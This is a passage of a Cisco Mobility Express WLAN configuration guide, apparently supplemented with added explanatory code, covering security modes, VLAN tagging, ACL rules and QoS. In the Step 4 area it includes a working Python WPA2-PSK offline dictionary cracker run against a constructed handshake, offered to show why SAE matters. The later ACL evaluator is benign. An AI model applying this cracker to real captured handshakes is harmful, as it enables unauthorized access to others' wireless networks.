Step 1
|
Choose . The WLAN Configuration window is displayed.
|
Step 2
|
Click Add New WLAN.
The Add New WLAN window is displayed.
|
Step 3
|
Under the General tab, set the following parameters:
-
WLAN ID—From the drop-down list, choose an ID number for this WLAN.
-
Profile Name—The profile name must be unique and must not exceed 32 characters.
-
SSID—By default the profile name also acts as the SSID. You can specify an SSID that is different from the WLAN profile name. Like the profile name, the SSID cannot exceed 32 characters and must be unique.
-
Admin State—From the drop-down list, choose Enabled to enable this WLAN, or Disabled to keep the WLAN configured without activating it. The default is Enabled.
-
Radio Policy—From the drop-down list, choose one of the following options:
-
All—Configures the WLAN to support dual-band (2.4 GHz and 5 GHz) capable clients
-
2.4 GHz only—Configures the WLAN to support 802.11b/g/n capable clients only
-
5 GHz only—Configures the WLAN to support 802.11a/n/ac capable clients only
The radio policy determines on which part of the spectrum every AP associated with this WLAN advertises it: 2.4 GHz, 5 GHz, or both.
-
Broadcast SSID—The default is Enabled, which makes the SSID discoverable in beacons. If you disable it, the SSID is omitted from beacons. Hiding the SSID is not a security control: clients that know the network probe for it by name, so the SSID is still visible to anyone capturing wireless traffic.
-
Local Profiling
|
Step 4
|
Under the WLAN Security tab, set one of the following security authentication options from the Security drop-down list:
- Open—Open authentication allows any device to authenticate to and associate with the AP. No credentials are checked and traffic on the WLAN is not encrypted, so any wireless device can join and any nearby receiver can read the traffic.
- Enhanced Open—Enhanced Open is based on Opportunistic Wireless Encryption (OWE) and provides encryption on networks that would otherwise be open (unencrypted), giving a higher level of protection against passive sniffing and simple attacks than a public, shared PSK.
With Enhanced Open, the client and Mobility Express perform a Diffie-Hellman key exchange during the access procedure and use the resulting pairwise secret as the PMK for the 4-way handshake.
Enhanced Open requires no special configuration or user interaction, but provides better security than a common, shared, public PSK. Note that OWE does not authenticate the network: it defeats passive eavesdropping, not an active attacker who stands up a rogue AP with the same SSID.
If you select Enhanced Open, you have the option to enable or disable OWE Transition Mode.
OWE transition mode allows OWE-capable and non-OWE stations (STAs) to connect to the same distribution system (DS) at the same time. OWE STAs that see an AP in OWE transition mode connect to its OWE WLAN.
Both WLANs, the open WLAN and the OWE WLAN, transmit beacon frames. The open WLAN's beacon and probe response frames carry the Wi-Fi Alliance OWE Transition Mode vendor IE with the BSSID and SSID of the OWE WLAN, and the OWE WLAN's frames carry the BSSID and SSID of the open WLAN.
OWE-capable STAs show the user only the SSID of the OWE WLAN (taken from the vendor IE in the open WLAN's beacons and probe responses) in the list of available networks; the open WLAN is suppressed. OWE-capable STAs associate only with the OWE WLAN of an AP in OWE transition mode.
PMF is mandatory on the OWE WLAN.
For more information about Enhanced Open, see the Wi-Fi Alliance's website.
- Personal—WPA3-Personal replaces the WPA2 PSK handshake with Simultaneous Authentication of Equals (SAE), as defined in IEEE 802.11-2016. With SAE the user experience is the same (enter a passphrase to connect), but SAE adds a password-authenticated key exchange before the 4-way handshake. Unlike WPA2-PSK, this exchange gives an attacker nothing that can be used to test passphrase guesses offline against captured frames: every guess requires a live exchange with the AP, so offline brute-force and dictionary attacks are defeated and online guessing is limited to the rate at which the network answers. SAE raises the cost of guessing; it does not make a weak passphrase strong. Protected Management Frames (PMF) are required for all WPA3-Personal connections. Previously, PMF was optional; with WPA3, PMF must be negotiated for every WPA3 connection, which adds protection against deauthentication and disassociation attacks.
If you choose Personal, you must configure a passphrase (iPSK is not supported with SAE; see the note below).
For more information about WPA3, see the Wi-Fi Alliance's website.
Note
|
iPSK is not supported for SAE security; only common passphrase security association is supported.
|
-
WPA2 Enterprise—This option stands for Wi-Fi Protected Access 2 with 802.1X/EAP authentication against either a local authentication server or a RADIUS server. This is the default option.
For local authentication, choose AP in the Authentication Server drop-down list. This is the Local EAP method: users and wireless clients are authenticated locally, with the controller in the primary AP acting as the authentication server and holding the local user database, so there is no dependence on an external authentication server.
For RADIUS server-based authentication, choose External Radius in the Authentication Server drop-down list. RADIUS is a client/server protocol that lets the controller consult a central server to authenticate users and authorize their access to the WLAN. You can specify up to two RADIUS authentication servers. For each server, specify the following details:
-
RADIUS IP—IPv4 address of the RADIUS server.
-
RADIUS Port—Enter the communication port of the RADIUS server. The default value is 1812.
-
Shared Secret—Enter the secret key shared with the RADIUS server, in ASCII format. This secret is what authenticates RADIUS messages between the controller and the server and protects the password attributes inside them, so use a long random value rather than a dictionary word, and configure the same value on the server.
Note
|
-
You can configure multiple RADIUS authentication and accounting servers on the ME controller. However, only one port ID per type can be used at any given time for all configured servers; this applies to authentication, accounting, mail, and logs. This port can be the default or a non-default number.
-
You can use either the default RADIUS port ID 1812 or a custom port ID, but ME supports only a single port ID at any given time.
If RADIUS server 1 is configured with port ID "X" and you then add RADIUS server 2 with port ID "Y", server 1 on port "X" stops working and only server 2 on port "Y" functions. To switch back to port ID "X", either add a new server or remove and re-add the existing server with port ID "X"; this in turn disables port ID "Y".
|
-
Guest—The controller can provide guest user access on WLANs that are specifically designated for guest users. To set this WLAN exclusively for guest user access, choose Guest as the Security.
You can set the authentication for guest users by choosing one of the following options in the Guest Type drop-down list:
-
WPA2 Personal—This option stands for Wi-Fi Protected Access 2 with pre-shared key (PSK). WPA2 Personal secures the network with PSK authentication: the same PSK is configured on the controller AP, under the WLAN security policy, and on every client. WPA2 Personal does not rely on an authentication server on your network and is used when you do not have an enterprise authentication server. Because every guest shares the one key, anyone who knows it and captures another guest's 4-way handshake can decrypt that guest's traffic, and a captured handshake allows offline guessing of the passphrase; use a long random passphrase and change it once it has been widely shared.
If you choose this option, specify the PSK in the Passphrase field and confirm it in the Confirm Passphrase field. The PSK you enter is hidden behind asterisks; check the Show Passphrase checkbox to reveal it.
-
Captive Portal (AP)—Choose this option to set up a captive portal that presents one of the following Captive Portal Types to users:
-
Require Username and Password—This is the default option. Choose it to authenticate guests with the usernames and passwords you define for guest users of this WLAN under Wireless Settings > WLAN Users. For more information, see Viewing and Managing WLAN Users.
-
Web Consent—Choose this option to grant guests access to the WLAN once they accept the displayed terms and conditions. Guest users get access without entering a username and password, so this option records consent but does not authenticate anyone.
-
Require Email Address—Choose this option to prompt guest users for their email address when they try to access the WLAN. Once a valid email address is entered, access is granted. Like Web Consent, this option lets guest users onto the WLAN without a username and password.
-
Captive Portal (External Web Server)—Choose this option for external captive portal authentication using a web server outside your network. Also specify the URL of the server in the Site URL field.
-
CMX Guest Connect—Choose this option to authenticate guests using Cisco CMX Connect. Also specify the URL of your CMX Cloud site in the Site URL field.
|
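The Personal (SAE) passage and the WPA2 Personal guest option above both turn on one property of WPA2-PSK: a captured 4-way handshake is enough to test passphrase guesses offline. The following added example, written for this page and not taken from the Cisco Mobility Express guide or its software, reproduces the WPA2-PSK key schedule (PMK = PBKDF2-HMAC-SHA1(passphrase, SSID), PTK = PRF-384, HMAC-SHA1-128 MIC over EAPOL-Key message 2/4) and runs a wordlist against a constructed "captured" frame. The SSID, MAC addresses, nonces, passphrase and wordlist are all constructed here; no real network is involved.

```python
"""WPA2-PSK offline dictionary attack on a constructed 4-way handshake capture.

Added example; not the guide's or Cisco's code. Shows why a captured WPA2
handshake is sufficient to guess the passphrase offline, which is exactly the
property SAE (WPA3-Personal) removes.
"""
import hashlib
import hmac
from typing import Iterable, Optional

# Offset of the 16-byte MIC in an EAPOL-Key frame: EAPOL header (4) + descriptor
# type (1) + key info (2) + key length (2) + replay counter (8) + nonce (32)
# + key IV (16) + RSC (8) + ID (8).
MIC_OFFSET = 81
NONCE_OFFSET = 17


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK: PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit key."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-384: HMAC-SHA1 over "Pairwise key expansion" || 0x00 || data || counter."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):  # 3 x 20 bytes covers the 48 bytes CCMP needs (KCK|KEK|TK)
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytearray:
    """EAPOL-Key message 2/4 from the station, MIC field zeroed, no key data."""
    f = bytearray(b"\x01\x03")            # EAPOL version 1, type 3 = EAPOL-Key
    f += (95).to_bytes(2, "big")          # body length
    f += b"\x02"                          # descriptor type: RSN
    f += b"\x01\x0a"                      # key info: MIC set, pairwise, version 2
    f += b"\x00\x10"                      # key length 16 (CCMP)
    f += (1).to_bytes(8, "big")           # replay counter
    f += snonce                           # key nonce = SNonce
    f += bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, ID
    f += bytes(16)                        # MIC placeholder
    f += bytes(2)                         # key data length 0
    return f


def mic_for(passphrase: str, ssid: str, aa: bytes, spa: bytes, anonce: bytes,
            frame_zero_mic: bytes) -> bytes:
    """MIC a station with this passphrase would put on the given message 2/4."""
    snonce = frame_zero_mic[NONCE_OFFSET:NONCE_OFFSET + 32]
    kck = wpa2_ptk(wpa2_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return eapol_mic(kck, frame_zero_mic)


def crack_psk(wordlist: Iterable[str], ssid: str, aa: bytes, spa: bytes,
              anonce: bytes, captured_msg2: bytes) -> Optional[str]:
    """Offline attack: SSID, both MACs, ANonce, SNonce and the MIC are all in the
    capture, so no further contact with the AP is needed for any guess."""
    target = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = bytearray(captured_msg2)
    zeroed[MIC_OFFSET:MIC_OFFSET + 16] = bytes(16)
    zeroed = bytes(zeroed)
    for candidate in wordlist:
        if hmac.compare_digest(mic_for(candidate, ssid, aa, spa, anonce, zeroed), target):
            return candidate
    return None


# Constructed test network; none of these values come from real hardware.
SSID = "corp-guest"
AA = bytes.fromhex("0011223344aa")   # AP (authenticator) MAC
SPA = bytes.fromhex("0011223344bb")  # client (supplicant) MAC
ANONCE = hashlib.sha256(b"anonce").digest()
SNONCE = hashlib.sha256(b"snonce").digest()


def capture_handshake(passphrase: str) -> bytes:
    """Stand-in for a sniffed message 2/4: the station signed it with the real passphrase."""
    frame = build_eapol_msg2(SNONCE)
    frame[MIC_OFFSET:MIC_OFFSET + 16] = mic_for(passphrase, SSID, AA, SPA, ANONCE, bytes(frame))
    return bytes(frame)


def demo() -> Optional[str]:
    captured = capture_handshake("Summer2019!")
    wordlist = ["password", "letmein", "Summer2019!", "welcome1"]  # constructed
    return crack_psk(wordlist, SSID, AA, SPA, ANONCE, captured)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The loop in crack_psk is the whole attack: each guess costs one PBKDF2 run and two HMACs, all computed locally. Under SAE the commit/confirm exchange does not leak a value that can be checked this way, so each guess costs a round trip to the AP, and PMF keeps an attacker from forcing reconnections to harvest fresh handshakes.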
Step 5
|
Under the VLAN & Firewall tab, in the Use VLAN Tagging drop-down list, choose Yes to enable VLAN tagging of packets. Then choose the VLAN ID to use for the tagging from the drop-down list. By default, VLAN Tagging is disabled.
With VLAN Tagging enabled, the chosen VLAN ID is inserted into the 802.1Q header of each frame to identify which VLAN (Virtual Local Area Network) the frame belongs to. The controller uses the VLAN ID to decide which VLAN a frame, including a broadcast, is forwarded to, which keeps the traffic of different VLANs separated on the wired network. Mapping each WLAN (for example guest, corporate, IoT) to its own VLAN is what makes that separation, and the per-VLAN ACLs in the next step, possible.
|
Step 6
|
If you have enabled VLAN Tagging, you can also enable a firewall for the WLAN based on Access Control Lists (ACLs). An ACL is a set of rules that limits access to a particular WLAN: it controls data traffic to and from wireless clients, or, when applied to the controller CPU, all traffic destined for the CPU.
To enable an ACL-based firewall:
-
In the Enable Firewall drop-down list, choose Yes.
-
In the ACL Name field, enter a name for the new ACL. You can enter up to 32 alphanumeric characters. The ACL name must be unique.
-
Click Apply.
-
To set rules for the ACL, click Add Rule.
Note that ACL rules are applied to the VLAN, not to the WLAN. Multiple WLANs can use the same VLAN and therefore inherit the same ACL rules, if any, so check every WLAN mapped to a VLAN before you tighten or loosen its ACL.
Configure a rule for this ACL as follows:
-
From the Action drop-down list, choose Deny to have this rule block matching packets or Permit to have it allow them. The default is Permit. The controller can permit or deny only IP packets in an ACL. Other types of packets (such as ARP packets) cannot be specified.
-
From the Protocol drop-down list, choose the protocol of the IP packets this rule applies to. These are the protocol options:
-
Any—Any protocol (this is the default value)
-
TCP—Transmission Control Protocol
-
UDP—User Datagram Protocol
-
ICMP—Internet Control Message Protocol
-
ESP—IP Encapsulating Security Payload
-
AH—Authentication Header
-
GRE—Generic Routing Encapsulation
-
IP in IP—Internet Protocol (IP) in IP (permits or denies IP-in-IP packets)
-
Eth Over IP—Ethernet-over-Internet Protocol
-
OSPF—Open Shortest Path First
-
Other—Any other Internet Assigned Numbers Authority (IANA) protocol. If you choose Other, enter the number of the desired protocol in the Protocol text box. You can find the list of assigned protocol numbers on the IANA website.
-
In the Dest. IP/Mask field, enter the IP address and netmask of the destination this rule applies to.
-
If you chose TCP or UDP, you must also specify a Destination Port. The port identifies the application that sends and receives the data through the networking stack; some ports are designated for particular applications such as Telnet, SSH, HTTP, and so on.
-
From the DSCP drop-down list, choose one of these options to specify the differentiated services code point (DSCP) value this rule matches. DSCP is a field in the IP header used to mark traffic for quality of service. You can choose:
-
Any—Any DSCP (this is the default value)
-
Specific—A specific DSCP from 0 to 63, which you enter in the DSCP edit box
-
Click the Apply icon to commit your changes.
|
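To make the rule fields above concrete, here is an added example, written for this page and not part of the Cisco Mobility Express guide or its software, that models an ACL rule as the GUI fields (Action, Protocol including Other, Dest. IP/Mask, Destination Port, DSCP), rejects rule combinations the GUI does not allow, and evaluates constructed packets against a constructed guest-VLAN ACL. Two points the guide does not state are assumptions made here and marked in the code: rules are matched in order with the first match winning, and an IP packet that matches no rule is denied. Non-IP traffic such as ARP is not evaluated at all, as the guide says.

```python
"""Evaluate VLAN & Firewall ACL rules as configured in Step 6.

Added example; not the guide's or Cisco's code. The IANA protocol numbers are
real; the ACL, packets, addresses and the two evaluation assumptions (first
match wins, implicit deny) are constructed for this example.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# IANA protocol numbers behind the Protocol drop-down entries ("Any" matches all).
PROTOCOL_NUMBERS = {
    "Any": None, "TCP": 6, "UDP": 17, "ICMP": 1, "ESP": 50, "AH": 51,
    "GRE": 47, "IP in IP": 4, "Eth Over IP": 97, "OSPF": 89,
}


@dataclass
class AclRule:
    action: str                            # "Permit" or "Deny"
    protocol: str = "Any"                  # a drop-down entry, or "Other"
    other_protocol: Optional[int] = None   # IANA number, only when protocol == "Other"
    dest: str = "0.0.0.0/0"                # Dest. IP/Mask
    dest_port: Optional[int] = None        # Destination Port, TCP/UDP only
    dscp: Optional[int] = None             # None means "Any", otherwise 0..63

    def protocol_number(self) -> Optional[int]:
        return self.other_protocol if self.protocol == "Other" else PROTOCOL_NUMBERS[self.protocol]


@dataclass
class IpPacket:
    dst: str
    protocol: int                          # IP protocol number
    dst_port: Optional[int] = None
    dscp: int = 0


def validate_rule(rule: AclRule) -> None:
    """Raise ValueError for a rule the GUI constraints above would not accept."""
    if rule.action not in ("Permit", "Deny"):
        raise ValueError("action must be Permit or Deny")
    if rule.protocol == "Other":
        if rule.other_protocol is None or not 0 <= rule.other_protocol <= 255:
            raise ValueError("Other requires an IANA protocol number 0-255")
    elif rule.protocol not in PROTOCOL_NUMBERS:
        raise ValueError(f"unknown protocol {rule.protocol!r}")
    if rule.dest_port is not None:
        if rule.protocol not in ("TCP", "UDP"):
            raise ValueError("a destination port is only valid for TCP or UDP")
        if not 0 <= rule.dest_port <= 65535:
            raise ValueError("port out of range")
    if rule.dscp is not None and not 0 <= rule.dscp <= 63:
        raise ValueError("DSCP must be 0-63")
    ip_network(rule.dest, strict=False)    # raises on a malformed IP/mask


def rule_matches(rule: AclRule, pkt: IpPacket) -> bool:
    proto = rule.protocol_number()
    if proto is not None and pkt.protocol != proto:
        return False
    if ip_address(pkt.dst) not in ip_network(rule.dest, strict=False):
        return False
    if rule.dest_port is not None and pkt.dst_port != rule.dest_port:
        return False
    if rule.dscp is not None and pkt.dscp != rule.dscp:
        return False
    return True


def evaluate(acl: List[AclRule], pkt: IpPacket) -> str:
    """ASSUMPTION (not stated by the guide): first matching rule wins, and an
    IP packet that matches nothing is denied."""
    for rule in acl:
        if rule_matches(rule, pkt):
            return rule.action
    return "Deny"


# Constructed guest-VLAN ACL: allow DNS to the local resolver and HTTPS anywhere,
# block everything else into the private range, keep EF-marked traffic off the
# guest VLAN, then let the rest out. Order matters: the resolver rule must come
# before the 10.0.0.0/8 deny.
GUEST_ACL = [
    AclRule("Permit", "UDP", dest="10.0.0.53/32", dest_port=53),
    AclRule("Deny", "Any", dest="10.0.0.0/8"),
    AclRule("Permit", "TCP", dest_port=443),
    AclRule("Deny", "Any", dscp=46),
    AclRule("Permit", "Any"),
]


def demo() -> List[str]:
    for rule in GUEST_ACL:
        validate_rule(rule)
    packets = [                                  # constructed traffic samples
        IpPacket("10.0.0.53", 17, 53),           # DNS to the resolver -> Permit
        IpPacket("10.0.1.5", 6, 22),             # SSH to an internal host -> Deny
        IpPacket("93.184.216.34", 6, 443),       # HTTPS to the Internet -> Permit
        IpPacket("93.184.216.34", 17, 5060, 46), # EF-marked SIP -> Deny
        IpPacket("8.8.8.8", 1),                  # ICMP out -> Permit (last rule)
    ]
    return [evaluate(GUEST_ACL, p) for p in packets]


if __name__ == "__main__":
    print(demo())
```

Because ME applies the ACL to the VLAN rather than the WLAN, the same list is what every WLAN mapped to that VLAN sees; the order of the Deny 10.0.0.0/8 rule relative to the resolver exception is the kind of detail worth checking against a packet list like the one in demo() before and after any change.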
Step 7
|
Quality of service (QoS) refers to the capability of a network to provide better service to selected network traffic over various technologies. The primary goal of QoS is to provide priority, including dedicated bandwidth, controlled jitter and latency (required by some real-time and interactive traffic), and improved loss characteristics.
The Cisco Mobility Express controller supports the following four QoS levels. Under the QoS tab, from the QoS drop-down list, choose one of the following QoS levels. Pick the lowest level the WLAN actually needs; a guest WLAN left at Platinum lets guest traffic compete with voice.
-
Platinum (Voice)—Ensures a high quality of service for voice over wireless.
-
Gold (Video)—Supports high-quality video applications.
-
Silver (Best Effort)—Supports normal bandwidth for clients.
-
Bronze (Background)—Provides the lowest bandwidth for guest services.
|
Step 8
|
Application Visibility classifies applications using the Network-Based Application Recognition (NBAR2) engine, and provides application-level visibility in wireless networks. Application Visibility enables the controller to detect and recognize more than 1000 applications and perform real-time analysis, and monitor network congestion and network link usage. This feature contributes to the Applications By Usage statistic in the .
To enable Application Visibility, choose Enabled (the default option) from the Application Visibility drop-down list. Otherwise, choose Disabled.
|
Step 9
|
Click Apply.
|